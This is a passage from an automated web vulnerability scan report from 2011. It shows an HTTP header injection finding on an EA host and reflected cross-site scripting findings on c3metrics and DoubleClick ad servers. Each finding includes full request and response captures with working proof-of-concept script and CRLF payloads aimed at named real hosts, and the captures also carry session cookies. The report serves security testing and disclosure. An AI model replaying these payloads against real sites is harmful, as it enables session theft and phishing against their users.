3.8. http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tos.ea.com
Path:   /legalapp/WEBPRIVACY/US/en/PC/

Issue detail

The value of REST URL parameter 3 is copied into the Content-Location response header. The payload ad77b%0d%0af03b2834043 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /legalapp/WEBPRIVACY/ad77b%0d%0af03b2834043/en/PC/ HTTP/1.1
Host: tos.ea.com
Proxy-Connection: keep-alive
Referer: http://customersupport.ea.com/loginapp/forgotScreenName.do?locale=en_US&surl=http%3A%2F%2Fsupport.ea.com%2Fci%2Fpta%2Flogin&curl=http%3A%2F%2Fsupport.ea.com%2Fapp%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A//www.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:21 GMT
Server: Apache/2.0.59 (Unix) mod_jk/1.2.23
Cache-Control: no-cache
Content-Location: webprivacy/ad77b
f03b2834043
/en/pc/default/54402_6/54402_7
Content-Type: text/html;charset=UTF-8
Content-Length: 46341

<div style="text-align: center;"><span style="font-weight:
bold;">ELECTRONIC ARTS PRIVACY
POLICY</span><br><br><span style="font-weight:
bold;">Effective Date</span>: June 3, 2011
</div><a hre
...[SNIP]...

4. Cross-site scripting (reflected)
There are 165 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload f62bc<script>alert(1)</script>2b3e2ee739c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480f62bc<script>alert(1)</script>2b3e2ee739c&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:10 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480f62bc<script>alert(1)</script>2b3e2ee739c-SM=adver_06-24-2011-13-31-10; expires=Mon, 27-Jun-2011 13:31:10 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480f62bc<script>alert(1)</script>2b3e2ee739c-VT=adver_06-24-2011-13-31-10_13822592201308922270; expires=Wed, 22-Jun-2016 13:31:10 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480f62bc<script>alert(1)</script>2b3e2ee739c-nUID=adver_13822592201308922270; expires=Fri, 24-Jun-2011 13:46:10 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480f62bc<script>alert(1)</script>2b3e2ee739c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='13822592201308922270';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';thi
...[SNIP]...

4.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload d4b45<script>alert(1)</script>3ebdfa8abb3 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adverd4b45<script>alert(1)</script>3ebdfa8abb3&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:08 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-26-48_11053703061308922008ZZZZadverd4b45%3Cscript%3Ealert%281%29%3C%2Fscript%3E3ebdfa8abb3_06-24-2011-13-31-08_15902481321308922268; expires=Wed, 22-Jun-2016 13:31:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11053703061308922008ZZZZadverd4b45%3Cscript%3Ealert%281%29%3C%2Fscript%3E3ebdfa8abb3_15902481321308922268; expires=Fri, 24-Jun-2011 13:46:08 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adverd4b45<script>alert(1)</script>3ebdfa8abb3';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15902481321308922268';t
...[SNIP]...

4.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b976e<script>alert(1)</script>1209bb882db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/b976e<script>alert(1)</script>1209bb882db&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:16 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-16_18074100621308922276; expires=Wed, 22-Jun-2016 13:31:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_18074100621308922276; expires=Fri, 24-Jun-2011 13:46:16 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='18074100621308922276';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/b976e<script>alert(1)</script>1209bb882db';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

4.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 317e7<script>alert(1)</script>655da98b355 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=317e7<script>alert(1)</script>655da98b355&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:12 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-12_14677270321308922272; expires=Wed, 22-Jun-2016 13:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_14677270321308922272; expires=Fri, 24-Jun-2011 13:46:12 GMT; path=/; domain=c3metrics.com
Content-Length: 6691
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='14677270321308922272';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='317e7<script>alert(1)</script>655da98b355';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

4.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 7dc4a<script>alert(1)</script>ae80ab2d3c2 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=727dc4a<script>alert(1)</script>ae80ab2d3c2&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:12 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Sun, 24-Jul-2011 20:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-12_12674423691308922272; expires=Wed, 22-Jun-2016 13:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_12674423691308922272; expires=Fri, 24-Jun-2011 13:46:12 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='12674423691308922272';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='727dc4a<script>alert(1)</script>ae80ab2d3c2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

4.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 58282<script>alert(1)</script>261c16694b8 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=58282<script>alert(1)</script>261c16694b8&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:13 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-13_6450759631308922273; expires=Wed, 22-Jun-2016 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_6450759631308922273; expires=Fri, 24-Jun-2011 13:46:13 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='6450759631308922273';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='58282<script>alert(1)</script>261c16694b8';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

4.7. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb131'-alert(1)-'6963b864478 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0fb131'-alert(1)-'6963b864478&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0fb131'-alert(1)-'6963b864478&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.8. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f90"-alert(1)-"9faeef96f93 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=030f90"-alert(1)-"9faeef96f93&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:21 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=030f90"-alert(1)-"9faeef96f93&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaq
...[SNIP]...

4.9. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9297"-alert(1)-"8496255074b was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=a9297"-alert(1)-"8496255074b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5856
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 24 Jun 2011 13:32:37 GMT
Expires: Fri, 24 Jun 2011 13:32:37 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
b30/7/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=a9297"-alert(1)-"8496255074bhttp://www.renu.com/coupons.html?utm_source=adrx&utm_medium=banner&utm_campaign=renu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscript
...[SNIP]...

